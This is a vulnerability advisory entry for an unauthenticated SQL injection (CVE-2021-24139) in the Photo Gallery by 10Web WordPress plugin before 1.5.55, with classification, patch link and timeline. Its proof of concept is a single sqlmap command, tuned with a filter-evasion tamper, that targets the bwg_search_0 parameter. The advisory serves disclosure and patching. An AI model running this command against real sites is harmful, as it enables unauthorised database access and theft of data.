WordPress Plugin Vulnerabilities

Photo Gallery by 10Web < 1.5.55 - Unauthenticated SQL Injection

Description

SQL injection in the Photo Gallery (10Web Photo Gallery) plugin before 1.5.55 exists via the frontend/models/model.php bwg_search_x parameter.

Impact
All gallery_type is affected by this bug and any unauthenticated remote attacker can exploit the plugin.

Proof of Concept

Sqlmap payload:
sqlmap -u 'http://example.com/?p=19&bwg_search_0=*' --dbs --risk 3 --level 5 --threads 10 --tamper=space2comment -p bwg_search_0 -f

Video: https://drive.google.com/file/d/1W93XUz5qvWjB27Rn-9L9bIwpBXa2OFNJ/view?usp=sharing
Backup link: https://mega.nz/file/S8UxyYpY#p-QLIwouqWq9Q4OV34KNZ8Zo2a7IAKjXVYJ9HZuh2Yk

Affects Plugins

Plugin icon
photo-gallery
Fixed in 1.5.55

References

CVE
CVE-2021-24139
URL
https://plugins.trac.wordpress.org/changeset/2304193

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
10.0 (critical)

Miscellaneous

Original Researcher
Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Submitter
Nguyen Anh Tien
Submitter website
https://research.sun-asterisk.com/
Submitter twitter
vigov5
Verified
No
WPVDB ID
2e33088e-7b93-44af-aa6a-e5d924f86e28

Timeline

Publicly Published
2020-05-15 (about 3 years ago)
Added
2020-05-15 (about 3 years ago)
Last Updated
2021-01-22 (about 3 years ago)

Other

Published
Title
Published
2022-05-30
Title
Better Find and Replace < 1.3.6 - Admin+ SQLi
Published
2024-02-09
Title
Awesome Support – WordPress HelpDesk & Support Plugin < 6.1.8 - Authenticated (Subscriber+) SQL Injection
Published
2023-04-19
Title
Accessibility Suite by Online ADA <= 4.11 - Subscriber+ SQLi
Published
2024-01-05
Title
WP ERP < 1.12.9 - Authenticated (Accounting manager+) SQL Injection
Published
2024-02-12
Title
MoveTo <= 6.2 - Unauthenticated SQL Injection